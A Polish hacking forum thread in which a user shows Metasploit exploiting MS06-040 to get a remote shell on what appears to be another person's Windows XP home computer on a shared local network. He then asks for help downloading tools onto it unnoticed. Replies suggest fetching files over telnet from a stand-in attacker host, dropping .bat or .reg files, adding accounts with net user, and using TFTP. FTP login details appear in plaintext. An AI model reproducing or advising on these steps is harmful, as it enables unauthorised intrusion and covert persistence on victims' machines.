metasploit, download problem ;[

[scorn]

wszystko działa, wszystko cacy, natomiast po wejsciu do w sumie gołego systemu problem jest następujący, nie ma nic, co umożliwiłoby łatwe proste i przyjemne ściągnięcie nań potrzebnych narzędzi.

Kod:

msf netapi_ms06_040(win32_bind) > set RHOST 10.0.10.170
RHOST -> 10.0.10.170
msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] This system may be patched or running Windows XP SP1 or SP2[*] RPC server responded with:[*] RESPONSE => response[*] STUB DATA = \x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7D\x00\x00\x00\x4B\x08\x00\x00[*] Exiting Bind Handler.
msf netapi_ms06_040(win32_bind) > unset RHOST
msf netapi_ms06_040(win32_bind) > set RHOST 10.0.8.63
RHOST -> 10.0.8.63
msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] Got connection from 10.0.9.4:54810 <-> 10.0.8.63:4444

Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

no i jesteśmy... ale dalej...
spróbujmy sciągnąc coś z ftp...

Kod:

Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ftp
ftp
open agregator.w.interia.pl
Uytkownik (agregator.w.interia.pl:(none)): agregator
m3f1st0f3l3s
dir

quit
chujwiecojeszcze ;-)

wynik jest taki sam - brak odpowiedzi od terminala, co mnie bardzo martwi... ;-)

dopiero po ctrl+c terminal reaguje:

Kod:

Caught interrupt, exit connection? [y/n] Dropping back to the console...

Caught interrupt, exit connection? [y/n] y[*] Exiting Bind Handler.
msf netapi_ms06_040(win32_bind) >

i tu leży właśnie istota problemu: jak ściągnąc coś ze zdalnego komputera, używając konsoli wygenerowanej przez metasploit'y?

[Dominik]

Nie znam się na tym, ale może ten komp albo router przez który się komunikuje ze światem ma we firewall'u zablokowane porty ftp :]

Próbowałeś może przez telnet?

[scorn]

1. próbowałem, nie ma tam firewalla (gdyby był, to nie wiem, czy bym się przebił tak łatwo ;-) ), i jest to zwykły box domowy, nie router.
2. telnetem próbowałem, nie chodzi tutaj o to. kwestią jest to, że "środowisko" metasploita nie uruchamia (raczej nie wyświetla) "poprawnie" programów typu edit, ftp, telnet, także nie w tym sęk, o czym mówisz, ale wszelkie uwagi, koncepcje, mile widziane.
3. jest kilka innych możliwości przejećia w pełni maszyny w takim przypadku, jak opisuje, tj. przez użycie odpowiednio zbudowanych komend echo:
echo "komenda" >> do.pliku.txt
i później użycie tego, jako wsadowych parametrów dla aplikacji.
np. ftp.exe -slik.txt
ale ten sposób też nie działa...
inne sposoby to zbudowanie pliku.reg, ale nie wiem, czy aby nie będzie wymagane kliknięcie "Dodaj" od użytkownika siedzącego przy monitorze (co demaskuje nas na starcie ;-) (chociaż generalnie jest możliwość z konsoli wydania polecenia z parametrem /y jako potwierdzenia... :S nie wiem...
dalszy sposób, to budowa pliku.bat ale też brak mi tu weny twórczej... także raz jeszcze: podpowiedzi, sugestje, pomysły jak najbardziej mile widziane ;-)

[Dominik]

Po IP domyślam się że jesteście w tej samej sieci osiedlowej, no chyba że podałeś nam inne.

A możesz zrobić coś takiego żeby przesłać jakiś plik *.bat, *.reg czy cokolwiek co odblokuje telnet a następnie będziesz mógł się zalogować przez niego na konto gościa, albo jakieś inne.

Powiedzmy że jesteś w stanie przesłać tam dowolny plik, niech więc uruchomi się automatycznie o danej porze i wykona to co napisałem wyrzej, albo jeszcze inaczej, ta osoba najprawdopodbniej korzysta z konta administratora, więc mógłbyś założyć tam swoje własne konto.

[blackicenavarro]

zalezy co chcesz zrobic z tamtym kompem. jezeli chcesz cos wyssac sa inne narzedzia ktore to zrobia. wg mnie nie liczy sie sposob ale wynik.

[scorn]

przykłady panowie... konkretne przykłady...? ;-)

[I_v0]

Jeżeli ma zablokowane te porty, to musisz sobie otworzyć tunel do jakiegoś kompa, i przez ten tunel wszystko robić, na windowsie nie robiłem tunelu nigdy, inaczej spróbuj ściągnąć z http przez telneta,
telnet my-zombie-ftp.some-fake-host.us 80
GET /scorn/narzedzie.c HTTP/1.1

wynik zapisz.

To z głowy pisałem, więc nie gwarantuję nic

[scorn]

kwestia tu jest taka sama jak przy fyp: nie daje wyniku zwrotnego i zazwyczaj trzeba zrywać połączenie i zaczynać od nowa (wykluczając opcje, że przy wpisaniu telnet w cmd.exe, odpala mu się okno telnetu jak przy win98 ;-) )

inne pomysły?
dodanie usera przez net user dalej net share?
średnio mi wychodzi, albo cos jebie z komendami, jak ktoś chce, to poprosze konkretne przykłady ;S

[c0sm0]

Scorn jezeli on ma winXP/2k to ma klienta, a jezeli to sieć lokalna to sciągnij tego serwera tftpd, do którego Ci linka podałem, uruchom u siebie i wtedy będziesz mógł nawiązać to połączenie.
W serwerze u siebie tylko ustaw katalog, w którym masz plik, który chcesz przesłać i powinno Ci to chodzić.

[scorn]

wine mi nie trawi tego, a na linucha nie chce mi się szukać teraz bo mam kaca ;-) (wogóle to jest na lina?)
także wiesz... :>
bardziej interesuje mnie opcja pt. net share, net user, ale mimo, że polecenia (niby) działają prawidłowo, bo "polecenie zostało wykonane pomyślnie" ale chuj z tym, bo i tak nie łapie... ;\